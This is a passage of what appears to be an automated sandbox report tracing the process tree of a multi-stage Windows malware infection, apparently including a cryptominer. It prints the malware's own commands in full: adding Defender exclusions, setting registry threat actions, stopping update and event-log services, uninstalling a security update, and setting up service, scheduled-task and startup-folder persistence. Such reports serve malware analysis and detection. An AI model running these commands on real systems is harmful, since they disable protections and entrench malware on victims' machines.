                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:1692
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                          6⤵
                                                                                                            PID:3244
                                                                                                            • C:\Windows\system32\wusa.exe
                                                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                              7⤵
                                                                                                                PID:1816
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                              6⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:4868
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                              6⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:3832
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                                                              6⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:2288
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                              6⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:4872
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                                                              6⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:256
                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                              6⤵
                                                                                                              • Power Settings
                                                                                                              PID:1384
                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                              6⤵
                                                                                                              • Power Settings
                                                                                                              PID:4928
                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                              6⤵
                                                                                                              • Power Settings
                                                                                                              PID:4448
                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                              6⤵
                                                                                                              • Power Settings
                                                                                                              PID:3836
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe delete "WSNKISKT"
                                                                                                              6⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:2456
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                                                                                              6⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:2312
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe stop eventlog
                                                                                                              6⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:4932
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe start "WSNKISKT"
                                                                                                              6⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:4372
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000009001\setup.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1000009001\setup.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3912
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSDC95.tmp\Install.exe
                                                                                                              .\Install.exe
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2256
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSDED7.tmp\Install.exe
                                                                                                                .\Install.exe /Rdprdidxe "385134" /S
                                                                                                                7⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Executes dropped EXE
                                                                                                                • Enumerates system info in registry
                                                                                                                PID:3536
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                  8⤵
                                                                                                                    PID:4928
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                      9⤵
                                                                                                                        PID:4328
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                          10⤵
                                                                                                                            PID:1840
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                              11⤵
                                                                                                                                PID:4900
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                            9⤵
                                                                                                                              PID:1408
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                10⤵
                                                                                                                                  PID:1996
                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                    11⤵
                                                                                                                                      PID:616
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                  9⤵
                                                                                                                                    PID:2156
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                      10⤵
                                                                                                                                        PID:3176
                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                          11⤵
                                                                                                                                            PID:3524
                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                        9⤵
                                                                                                                                          PID:1692
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                            10⤵
                                                                                                                                              PID:4404
                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                11⤵
                                                                                                                                                  PID:3128
                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                              9⤵
                                                                                                                                                PID:1832
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                  10⤵
                                                                                                                                                    PID:2748
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                      11⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:4172
                                                                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                        12⤵
                                                                                                                                                          PID:1016
                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:712
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                      9⤵
                                                                                                                                                        PID:5096
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                          10⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          PID:3248
                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                            11⤵
                                                                                                                                                              PID:3732
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "bRfJDuKmNsszhfPRJj" /SC once /ST 00:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSDED7.tmp\Install.exe\" oU /rjUdidcB 385134 /S" /V1 /F
                                                                                                                                                        8⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:3080
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          9⤵
                                                                                                                                                            PID:3848
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:2316
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\onefile_2316_133634031796339515\stub.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:1408
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:2940
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  PID:2224
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                    4⤵
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:1384
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 260
                                                                                                                                                    4⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:1884
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000082001\quickaccesspopup.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000082001\quickaccesspopup.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  PID:2432
                                                                                                                                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4668
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000088001\spain.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1000088001\spain.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:1020
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000088001\spain.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000088001\spain.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:424
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:'""
                                                                                                                                                        5⤵
                                                                                                                                                          PID:2880
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -Command "Add-MpPreference -ExclusionPath 'C:'"
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:3784
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v1.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v1.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:1340
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v1.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v1.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4192
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell -Command " $WshShell = New-Object -ComObject WScript.Shell $Shortcut = $WshShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XMRigInstaller.lnk') $Shortcut.TargetPath = 'C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v1.exe' $Shortcut.Save() "
                                                                                                                                                              7⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              • Drops startup file
                                                                                                                                                              PID:1612
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v2.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v2.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2144
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v2.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v2.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            PID:1480
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell -Command " $WshShell = New-Object -ComObject WScript.Shell $Shortcut = $WshShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ClientPersist.lnk') $Shortcut.TargetPath = 'C:\Windows\System32\Drivers Update Utility.exe' $Shortcut.Save() "
                                                                                                                                                              7⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              • Drops startup file
                                                                                                                                                              PID:4128
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                  1⤵
                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:424
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2224 -ip 2224
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3080
                                                                                                                                                  • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                    C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:3660
                                                                                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                      2⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:2228
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2492
                                                                                                                                                        • C:\Windows\system32\wusa.exe
                                                                                                                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1560
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                          2⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:4868
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                          2⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:5092
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                          2⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:4116
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe stop bits
                                                                                                                                                          2⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:1116
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                          2⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:3748
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                          2⤵
                                                                                                                                                          • Power Settings
                                                                                                                                                          PID:2724
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                          2⤵
                                                                                                                                                          • Power Settings
                                                                                                                                                          PID:2660
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                          2⤵
                                                                                                                                                          • Power Settings
                                                                                                                                                          PID:3176
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                          2⤵
                                                                                                                                                          • Power Settings
                                                                                                                                                          PID:3940
                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                          C:\Windows\system32\conhost.exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2424
                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                            explorer.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1432
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:1752
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSDED7.tmp\Install.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7zSDED7.tmp\Install.exe oU /rjUdidcB 385134 /S
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            PID:2004
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2748
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4192
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4172
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:4872
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5068
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:2312
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:712
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2156
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:1516
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:4572
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2612
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:400
                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:4496
                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1016
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:4856
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                  PID:1380
                                                                                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:564
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
